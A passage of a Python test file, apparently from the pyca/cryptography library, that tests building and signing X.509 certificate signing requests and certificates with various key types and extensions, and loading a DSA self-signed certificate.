private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME,
u'PyCA'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=None), critical=True
).sign(private_key, hashes.SHA1(), backend)
loaded_request = x509.load_pem_x509_csr(
request.public_bytes(encoding=serialization.Encoding.PEM), backend
)
subject = loaded_request.subject
assert isinstance(subject, x509.Name)
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.path_length is None
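# path_length=None in BasicConstraints means the CA may issue an unlimited
# chain of intermediates and is preserved when the extension is added to a CSR.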
@pytest.mark.parametrize(
"unrecognized", [
x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4.5"),
b"abcdef",
)
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_unrecognized_extension(self, backend, unrecognized):
private_key = RSA_KEY_2048.private_key(backend)
cert = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(x509.OID_COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(x509.OID_COUNTRY_NAME, u'US')])
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
).public_key(
private_key.public_key()
).serial_number(
123
).add_extension(
unrecognized, critical=False
).sign(private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_oid(unrecognized.oid)
assert ext.value == unrecognized
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCertificateSigningRequestBuilder(object):
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_sign_invalid_hash_algorithm(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([])
)
with pytest.raises(TypeError):
builder.sign(private_key, 'NotAHash', backend)
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_request_with_unsupported_hash_ed25519(self, backend):
private_key = ed25519.Ed25519PrivateKey.generate()
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_request_with_unsupported_hash_ed448(self, backend):
private_key = ed448.Ed448PrivateKey.generate()
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_rsa_with_md5(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
)
request = builder.sign(private_key, hashes.MD5(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.MD5)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_dsa_with_md5(self, backend):
private_key = DSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.MD5(), backend)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_ec_with_md5(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = EC_KEY_SECP256R1.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.MD5(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_no_subject_name(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_ca_request_with_rsa(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_ca_request_with_unicode(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME,
u'PyCA\U0001f37a'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
loaded_request = x509.load_pem_x509_csr(
request.public_bytes(encoding=serialization.Encoding.PEM), backend
)
subject = loaded_request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA\U0001f37a'),
]
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_subject_dn_asn1_types(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"mysite.com"),
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"value"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"value"),
x509.NameAttribute(NameOID.STREET_ADDRESS, u"value"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"value"),
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u"value"),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u"value"),
x509.NameAttribute(NameOID.SURNAME, u"value"),
x509.NameAttribute(NameOID.GIVEN_NAME, u"value"),
x509.NameAttribute(NameOID.TITLE, u"value"),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u"value"),
x509.NameAttribute(NameOID.X500_UNIQUE_IDENTIFIER, u"value"),
x509.NameAttribute(NameOID.DN_QUALIFIER, u"value"),
x509.NameAttribute(NameOID.PSEUDONYM, u"value"),
x509.NameAttribute(NameOID.USER_ID, u"value"),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u"value"),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u"value"),
x509.NameAttribute(NameOID.JURISDICTION_COUNTRY_NAME, u"US"),
x509.NameAttribute(
NameOID.JURISDICTION_LOCALITY_NAME, u"value"
),
x509.NameAttribute(
NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME, u"value"
),
x509.NameAttribute(NameOID.BUSINESS_CATEGORY, u"value"),
x509.NameAttribute(NameOID.POSTAL_ADDRESS, u"value"),
x509.NameAttribute(NameOID.POSTAL_CODE, u"value"),
])
).sign(private_key, hashes.SHA256(), backend)
for oid, asn1_type in TestNameAttribute.EXPECTED_TYPES:
assert request.subject.get_attributes_for_oid(
oid
)[0]._type == asn1_type
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_ca_request_with_multivalue_rdns(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
subject = x509.Name([
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.TITLE, u'Test'),
x509.NameAttribute(NameOID.COMMON_NAME, u'Multivalue'),
x509.NameAttribute(NameOID.SURNAME, u'RDNs'),
]),
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA')
]),
])
request = x509.CertificateSigningRequestBuilder().subject_name(
subject
).sign(private_key, hashes.SHA1(), backend)
loaded_request = x509.load_pem_x509_csr(
request.public_bytes(encoding=serialization.Encoding.PEM), backend
)
assert isinstance(loaded_request.subject, x509.Name)
assert loaded_request.subject == subject
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_nonca_request_with_rsa(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), critical=True,
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
def test_build_ca_request_with_ec(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, ec.EllipticCurvePublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_ca_request_with_ed25519(self, backend):
private_key = ed25519.Ed25519PrivateKey.generate()
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, None, backend)
assert request.signature_hash_algorithm is None
public_key = request.public_key()
assert isinstance(public_key, ed25519.Ed25519PublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_ca_request_with_ed448(self, backend):
private_key = ed448.Ed448PrivateKey.generate()
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, None, backend)
assert request.signature_hash_algorithm is None
public_key = request.public_key()
assert isinstance(public_key, ed448.Ed448PublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
@pytest.mark.requires_backend_interface(interface=DSABackend)
def test_build_ca_request_with_dsa(self, backend):
private_key = DSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, dsa.DSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
def test_add_duplicate_extension(self):
builder = x509.CertificateSigningRequestBuilder().add_extension(
x509.BasicConstraints(True, 2), critical=True,
)
with pytest.raises(ValueError):
builder.add_extension(
x509.BasicConstraints(True, 2), critical=True,
)
def test_set_invalid_subject(self):
builder = x509.CertificateSigningRequestBuilder()
with pytest.raises(TypeError):
builder.subject_name('NotAName')
def test_add_invalid_extension_type(self):
builder = x509.CertificateSigningRequestBuilder()
with pytest.raises(TypeError):
builder.add_extension(object(), False)
def test_add_unsupported_extension(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
builder = builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).add_extension(
DummyExtension(), False
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA256(), backend)
def test_key_usage(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
request = builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False
),
critical=False
).sign(private_key, hashes.SHA256(), backend)
assert len(request.extensions) == 1
ext = request.extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert ext.critical is False
assert ext.value == x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False
)
def test_key_usage_key_agreement_bit(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
request = builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=True
),
critical=False
).sign(private_key, hashes.SHA256(), backend)
assert len(request.extensions) == 1
ext = request.extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert ext.critical is False
assert ext.value == x509.KeyUsage(
digital_signature=False,
content_commitment=False,
key_encipherment=False,
data_encipherment=False,
key_agreement=True,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=True
)
def test_add_two_extensions(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
request = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
ext = request.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(ext.value) == [x509.DNSName(u"cryptography.io")]
def test_set_subject_twice(self):
builder = x509.CertificateSigningRequestBuilder()
builder = builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
)
with pytest.raises(ValueError):
builder.subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
)
def test_subject_alt_names(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
san = x509.SubjectAlternativeName([
x509.DNSName(u"example.com"),
x509.DNSName(u"*.example.com"),
x509.RegisteredID(x509.ObjectIdentifier("1.2.3.4.5.6.7")),
x509.DirectoryName(x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u'PyCA'),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u'We heart UTF8!\u2122'
)
])),
x509.IPAddress(ipaddress.ip_address(u"127.0.0.1")),
x509.IPAddress(ipaddress.ip_address(u"ff::")),
x509.OtherName(
type_id=x509.ObjectIdentifier("1.2.3.3.3.3"),
value=b"0\x03\x02\x01\x05"
),
x509.RFC822Name(u"test@example.com"),
x509.RFC822Name(u"email"),
x509.RFC822Name(u"email@xn--eml-vla4c.com"),
x509.UniformResourceIdentifier(
u"https://xn--80ato2c.cryptography"
),
x509.UniformResourceIdentifier(
u"gopher://cryptography:70/some/path"
),
])
csr = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"SAN"),
])
).add_extension(
san,
critical=False,
).sign(private_key, hashes.SHA256(), backend)
assert len(csr.extensions) == 1
ext = csr.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert not ext.critical
assert ext.oid == ExtensionOID.SUBJECT_ALTERNATIVE_NAME
assert ext.value == san
def test_invalid_asn1_othername(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"SAN"),
])
).add_extension(
x509.SubjectAlternativeName([
x509.OtherName(
type_id=x509.ObjectIdentifier("1.2.3.3.3.3"),
value=b"\x01\x02\x01\x05"
),
]),
critical=False,
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
def test_subject_alt_name_unsupported_general_name(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"SAN"),
])
).add_extension(
x509.SubjectAlternativeName([FakeGeneralName("")]),
critical=False,
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
def test_extended_key_usage(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
eku = x509.ExtendedKeyUsage([
ExtendedKeyUsageOID.CLIENT_AUTH,
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CODE_SIGNING,
])
builder = x509.CertificateSigningRequestBuilder()
request = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).add_extension(
eku, critical=False
).sign(private_key, hashes.SHA256(), backend)
ext = request.extensions.get_extension_for_oid(
ExtensionOID.EXTENDED_KEY_USAGE
)
assert ext.critical is False
assert ext.value == eku
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_rsa_key_too_small(self, backend):
private_key = RSA_KEY_512.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
)
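# A 512-bit (64-byte) modulus is too small to hold a PKCS#1 v1.5-encoded
# SHA-512 DigestInfo (64-byte digest plus ASN.1 and padding overhead), so
# OpenSSL refuses to sign and reports "Digest too big for RSA key".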
with pytest.raises(ValueError) as exc:
builder.sign(private_key, hashes.SHA512(), backend)
assert str(exc.value) == "Digest too big for RSA key"
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_aia(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
aia = x509.AuthorityInformationAccess([
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier(u"http://ocsp.domain.com")
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier(u"http://domain.com/ca.crt")
)
])
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
aia, critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_INFORMATION_ACCESS
)
assert ext.value == aia
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_ski(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
ski = x509.SubjectKeyIdentifier.from_public_key(
subject_private_key.public_key()
)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
ski, critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
assert ext.value == ski
@pytest.mark.parametrize(
"aki",
[
x509.AuthorityKeyIdentifier(
b"\xc3\x9c\xf3\xfc\xd3F\x084\xbb\xceF\x7f\xa0|[\xf3\xe2\x08"
b"\xcbY",
None,
None
),
x509.AuthorityKeyIdentifier(
b"\xc3\x9c\xf3\xfc\xd3F\x084\xbb\xceF\x7f\xa0|[\xf3\xe2\x08"
b"\xcbY",
[
x509.DirectoryName(
x509.Name([
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u"PyCA"
),
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography CA"
)
])
)
],
333
),
x509.AuthorityKeyIdentifier(
None,
[
x509.DirectoryName(
x509.Name([
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u"PyCA"
),
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography CA"
)
])
)
],
333
),
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_aki(self, aki, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
aki, critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.AUTHORITY_KEY_IDENTIFIER
)
assert ext.value == aki
def test_ocsp_nocheck(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.OCSPNoCheck(), critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.OCSP_NO_CHECK
)
assert isinstance(ext.value, x509.OCSPNoCheck)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestDSACertificate(object):
def test_load_dsa_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "dsa_selfsigned_ca.pem"),
x509.load_pem_x509_certificate,
backend
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA1)
public_key = cert.public_key()
assert isinstance(public_key, dsa.DSAPublicKey)
num = public_key.public_numbers()
assert num.y == int(
"4c08bfe5f2d76649c80acf7d431f6ae2124b217abc8c9f6aca776ddfa94"
"53b6656f13e543684cd5f6431a314377d2abfa068b7080cb8ddc065afc2"
"dea559f0b584c97a2b235b9b69b46bc6de1aed422a6f341832618bcaae2"
"198aba388099dafb05ff0b5efecb3b0ae169a62e1c72022af50ae68af3b"
"033c18e6eec1f7df4692c456ccafb79cc7e08da0a5786e9816ceda651d6"
"1b4bb7b81c2783da97cea62df67af5e85991fdc13aff10fc60e06586386"
"b96bb78d65750f542f86951e05a6d81baadbcd35a2e5cad4119923ae6a2"
"002091a3d17017f93c52970113cdc119970b9074ca506eac91c3dd37632"
"5df4af6b3911ef267d26623a5a1c5df4a6d13f1c", 16
)
assert num.parameter_numbers.g == int(
"4b7ced71dc353965ecc10d441a9a06fc24943a32d66429dd5ef44d43e67"
"d789d99770aec32c0415dc92970880872da45fef8dd1e115a3e4801387b"
"a6d755861f062fd3b6e9ea8e2641152339b828315b1528ee6c7b79458d2"
"1f3db973f6fc303f9397174c2799dd2351282aa2d8842c357a73495bbaa"
"c4932786414c55e60d73169f5761036fba29e9eebfb049f8a3b1b7cee6f"
"3fbfa136205f130bee2cf5b9c38dc1095d4006f2e73335c07352c64130a"
"1ab2b89f13b48f628d3cc3868beece9bb7beade9f830eacc6fa241425c0"
"b3fcc0df416a0c89f7bf35668d765ec95cdcfbe9caff49cfc156c668c76"
"fa6247676a6d3ac945844a083509c6a1b436baca", 16
)
assert num.parameter_numbers.p == int(
"bfade6048e373cd4e48b677e878c8e5b08c02102ae04eb2cb5c46a523a3"
"af1c73d16b24f34a4964781ae7e50500e21777754a670bd19a7420d6330"
"84e5556e33ca2c0e7d547ea5f46a07a01bf8669ae3bdec042d9b2ae5e6e"
"cf49f00ba9dac99ab6eff140d2cedf722ee62c2f9736857971444c25d0a"
"33d2017dc36d682a1054fe2a9428dda355a851ce6e6d61e03e419fd4ca4"
"e703313743d86caa885930f62ed5bf342d8165627681e9cc3244ba72aa2"
"2148400a6bbe80154e855d042c9dc2a3405f1e517be9dea50562f56da93"
"f6085f844a7e705c1f043e65751c583b80d29103e590ccb26efdaa0893d"
"833e36468f3907cfca788a3cb790f0341c8a31bf", 16
)
assert num.parameter_numbers.q == int(
"822ff5d234e073b901cf5941f58e1f538e71d40d", 16
)
def test_signature(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "dsa_selfsigned_ca.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.signature == binascii.unhexlify(
b"302c021425c4a84a936ab311ee017d3cbd9a3c650bb3ae4a02145d30c64b4326"
b"86bdf925716b4ed059184396bcce"
)
r, s = decode_dss_signature(cert.signature)
assert r == 215618264820276283222494627481362273536404860490
assert s == 532023851299196869156027211159466197586787351758
def test_tbs_certificate_bytes(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "dsa_selfsigned_ca.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.tbs_certificate_bytes == binascii.unhexlify(
b"3082051aa003020102020900a37352e0b2142f86300906072a8648ce3804033"
b"067310b3009060355040613025553310e300c06035504081305546578617331"
b"0f300d0603550407130641757374696e3121301f060355040a1318496e74657"
b"26e6574205769646769747320507479204c7464311430120603550403130b50"
b"79434120445341204341301e170d3134313132373035313431375a170d31343"
b"13232373035313431375a3067310b3009060355040613025553310e300c0603"
b"55040813055465786173310f300d0603550407130641757374696e3121301f0"
b"60355040a1318496e7465726e6574205769646769747320507479204c746431"
b"1430120603550403130b50794341204453412043413082033a3082022d06072"
